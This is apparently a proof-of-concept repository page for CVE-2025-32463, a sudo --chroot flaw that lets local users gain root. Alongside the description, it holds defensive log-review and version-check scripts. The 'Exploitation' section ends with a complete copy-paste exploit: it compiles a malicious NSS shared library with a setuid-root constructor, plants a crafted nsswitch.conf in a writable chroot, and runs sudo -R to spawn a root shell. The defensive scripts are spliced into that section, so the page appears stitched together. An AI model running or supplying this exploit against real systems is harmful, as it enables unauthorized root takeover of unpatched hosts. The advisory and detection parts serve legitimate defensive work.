PoC details: 78202a15bb977415177fe32c9e17f9d02ac29d30

Source
Related vulnerability
Title: Sudo security vulnerability (CVE-2025-32463)
Description: Sudo is a program for Unix-like systems that allows users to execute commands with special privileges in a secure way. Sudo versions before 1.9.17p1 contain a security vulnerability that stems from using /etc/nsswitch.conf from a user-controlled directory, which can lead to obtaining root access.
Description
Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.
Introduction
# CVE-2025-32463
This repository contains an educational proof-of-concept (PoC) exploit for CVE-2025-32463, a critical privilege escalation vulnerability in the sudo command. The vulnerability allows a local user to gain root privileges on affected systems.

## CVE ID: CVE-2025-32463

- Type: Local Privilege Escalation (LPE)
- CVSS v3.1 Score: 9.3 (Critical) - `AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
- Vendor: Sudo Project
- Affected Versions: Sudo versions prior to `1.9.17p1`

The vulnerability exists in the `-R` (`--chroot`) option of sudo. When this option is used with a user-controlled directory, sudo incorrectly trusts the `nsswitch.conf` file from within that chroot jail. This allows an attacker to specify a malicious shared library for the Name Service Switch (NSS) mechanism to load, resulting in code execution with root privileges.

The sudo command needs to resolve user and group identities. To do this, it uses the Name Service Switch (NSS) mechanism, which is configured by the `/etc/nsswitch.conf` file. This file specifies which libraries (e.g., `libnss_files.so.2`, `libnss_systemd.so.2`) should be used to look up different types of information (passwords, groups, hosts, etc.).

When the `-R` or `--chroot` option is used, sudo changes its root directory to the specified path before executing the command. The vulnerability is that sudo would then read the `nsswitch.conf` file from within this new chroot environment (`$CHROOT/etc/nsswitch.conf`) instead of using the trusted host system's `/etc/nsswitch.conf`.
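Because the dangerous ingredient is a chroot directory that an ordinary user can write to, a defender reviewing sudo's logs wants to know who invoked `sudo -R` and against which path. The following filter is an added example and is not part of the PoC repository. It assumes that sudo writes the chroot directory as a `CHROOT=...` field in its log line (the field name is an assumption, taken from sudo 1.9's logging format), and the sample log line is constructed for illustration.

```bash
#!/bin/sh
# Added example, not code from the PoC repository. Extracts sudo log lines that
# record a chroot (-R) invocation and flags chroot directories that live in
# locations ordinary users can normally write to.

# Constructed sample auth log: one ordinary sudo line, one with CHROOT= (assumed field name).
SAMPLE_LOG='Jul  1 10:00:00 host sudo[4241]:     alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/id
Jul  1 10:00:05 host sudo[4242]:     alice : TTY=pts/1 ; PWD=/tmp/stage ; USER=root ; CHROOT=/tmp/stage/exploit ; COMMAND=/usr/bin/id'

# filter_sudo_chroot_log: reads log lines on stdin, prints "<user> <chroot> <command>"
# for every sudo line that carries a CHROOT= field.
filter_sudo_chroot_log() {
  grep -E 'sudo\[[0-9]+\]:.*CHROOT=' \
    | sed -E 's/.*sudo\[[0-9]+\]: +([^ ]+) .*CHROOT=([^ ]+) ; .*COMMAND=(.*)$/\1 \2 \3/'
}

# is_user_writable_path: heuristic (an assumption, adjust to local policy) that a
# chroot directory under a world- or user-writable tree deserves a closer look.
is_user_writable_path() {
  case "$1" in
    /tmp/*|/var/tmp/*|/dev/shm/*|/home/*) return 0 ;;
    *) return 1 ;;
  esac
}

# review_chroot_uses: runs the filter over stdin and annotates suspicious entries.
review_chroot_uses() {
  filter_sudo_chroot_log | while read -r user chroot cmd; do
    if is_user_writable_path "$chroot"; then
      printf 'REVIEW  user=%s chroot=%s (user-writable location) cmd=%s\n' "$user" "$chroot" "$cmd"
    else
      printf 'info    user=%s chroot=%s cmd=%s\n' "$user" "$chroot" "$cmd"
    fi
  done
}

# Run against the constructed sample when invoked directly with --demo;
# on a real host pipe the auth log in instead, e.g. journalctl _COMM=sudo | review_chroot_uses
if [ "${1:-}" = "--demo" ]; then
  printf '%s\n' "$SAMPLE_LOG" | review_chroot_uses
fi
```

On a patched system these log lines are still worth reviewing, since the chroot feature remains a way to run commands against an unusual root; the writable-location list is only a starting heuristic.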

## Testing Vulnerability

This is the fastest and safest way to check. It uses the `-R` option in a way that is guaranteed to fail, and the wording of the error message tells you whether sudo still accepts the option:

```bash
sudo -R nonexistent_directory nonexistent_command
```
If your system is VULNERABLE, you will see an error like this:

```bash
sudo: nonexistent_directory: No such file or directory
```

If your system is PATCHED, you will see an error like this:

```bash
sudo: you are not permitted to use the -R option with nonexistent_command
```

## Exploitation
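The two checks above (the version range and the error message from the harmless probe) are easy to script across a fleet. The script below is an added example, not code from the PoC repository: it parses a `sudo --version` string against the fixed release `1.9.17p1` stated on this page and classifies the probe's error text using the two messages quoted above. Any other message (for example a sudo built without chroot support, or a sudoers policy that rejects the command) is reported as undetermined rather than guessed.

```bash
#!/bin/sh
# Added example, not code from the PoC repository.
# 1) sudo_is_vulnerable: version comparison against the fixed release 1.9.17p1.
# 2) classify_probe_output: interpret the error text of the harmless -R probe.

# parse_sudo_version "Sudo version 1.9.17p1" -> "1 9 17 1"
# Accepts either the bare version or the first line of `sudo --version`.
parse_sudo_version() {
  ver=${1#"Sudo version "}
  base=${ver%%p*}                      # "1.9.17"
  case "$ver" in
    *p*) plevel=${ver##*p} ;;          # "1" from "1.9.17p1"
    *)   plevel=0 ;;                   # no patch level means p0
  esac
  major=${base%%.*}
  rest=${base#*.}
  minor=${rest%%.*}
  patch=${rest#*.}
  [ "$patch" = "$rest" ] && patch=0    # "1.9" with no third component
  echo "$major $minor $patch $plevel"
}

# sudo_is_vulnerable VERSION -> exit 0 if older than 1.9.17p1 (the page's affected range), 1 otherwise
sudo_is_vulnerable() {
  set -- $(parse_sudo_version "$1")
  major=$1; minor=$2; patch=$3; plevel=$4
  if   [ "$major" -ne 1 ];  then [ "$major" -lt 1 ];  return
  elif [ "$minor" -ne 9 ];  then [ "$minor" -lt 9 ];  return
  elif [ "$patch" -ne 17 ]; then [ "$patch" -lt 17 ]; return
  else                           [ "$plevel" -lt 1 ]; return
  fi
}

# classify_probe_output TEXT -> prints vulnerable | patched | undetermined
# The two patterns are the error messages quoted in the README above.
classify_probe_output() {
  case "$1" in
    *"No such file or directory"*)          echo vulnerable;   return 0 ;;
    *"not permitted to use the -R option"*) echo patched;      return 1 ;;
    *)                                      echo undetermined; return 2 ;;
  esac
}

# Live check of the local host: only runs when invoked with --check.
# -n keeps sudo from prompting for a password in an unattended run.
if [ "${1:-}" = "--check" ]; then
  v=$(sudo --version 2>/dev/null | head -n1)
  if sudo_is_vulnerable "$v"; then
    echo "version: $v is within the affected range (before 1.9.17p1)"
  else
    echo "version: $v is at or beyond the fixed release"
  fi
  probe=$(sudo -n -R nonexistent_directory nonexistent_command 2>&1)
  echo "probe:   $(classify_probe_output "$probe")"
fi
```

Treat the version check as the authoritative signal and the probe as a cross-check: the probe's wording depends on how sudo was built and configured, so an "undetermined" result is a reason to look at `sudo --version`, not a clean bill of health.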

Just run this in your terminal:

```bash
STAGE=$(mktemp -d /tmp/exploit.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > exploit.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void exploit(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/sh", "sh", "-c", "/bin/bash", NULL);
}
EOF

# Create the chroot structure AND a lib directory inside it
mkdir -p exploit/etc exploit/lib
echo "passwd: /exploit123" > exploit/etc/nsswitch.conf
cp /etc/group exploit/etc

# Compile the library directly into the chroot's ./lib folder
gcc -shared -fPIC -Wl,-init,exploit -o exploit/lib/exploit123.so.2 exploit.c

echo "Pwned!"
sudo -R exploit exploit123
```

Disclaimer: This information is provided for educational and security testing purposes only. Use only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
File snapshot

```
[4.0K] /data/pocs/78202a15bb977415177fe32c9e17f9d02ac29d30
└── [2.9K] README.md
0 directories, 1 file
```